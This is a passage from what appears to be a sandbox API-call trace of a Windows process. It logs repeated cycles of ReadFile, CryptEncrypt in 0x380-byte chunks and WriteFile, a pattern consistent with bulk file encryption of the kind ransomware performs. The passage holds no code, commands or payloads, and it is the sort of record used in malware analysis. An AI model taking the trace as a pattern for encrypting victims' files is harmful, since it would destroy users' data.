pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.630] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.631] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.631] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.631] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.631] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.631] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.631] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.631] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.631] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.631] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.631] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.631] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.631] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.632] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.632] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.632] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.632] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.632] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.632] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.632] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.632] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.632] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.632] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.632] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.632] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.632] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.632] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.633] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.633] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.648] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.648] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.648] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.648] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.648] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.648] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.648] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.648] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.648] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.648] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.648] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.648] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.648] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.649] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.649] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.649] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.649] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.649] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.649] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.649] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.649] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.649] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.649] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.649] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.649] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.649] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.649] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.650] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.650] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.650] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.650] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.650] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.650] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.650] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.650] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.650] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.650] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.650] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.650] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.650] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.650] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.650] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.651] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.651] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.651] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.651] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.651] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.651] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.651] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.651] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.651] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.651] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.651] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.651] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.651] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.651] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.651] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.652] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.652] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.652] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.652] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.652] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.652] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.652] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.652] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.652] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.652] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.652] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.652] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.652] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.652] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.652] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.652] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, 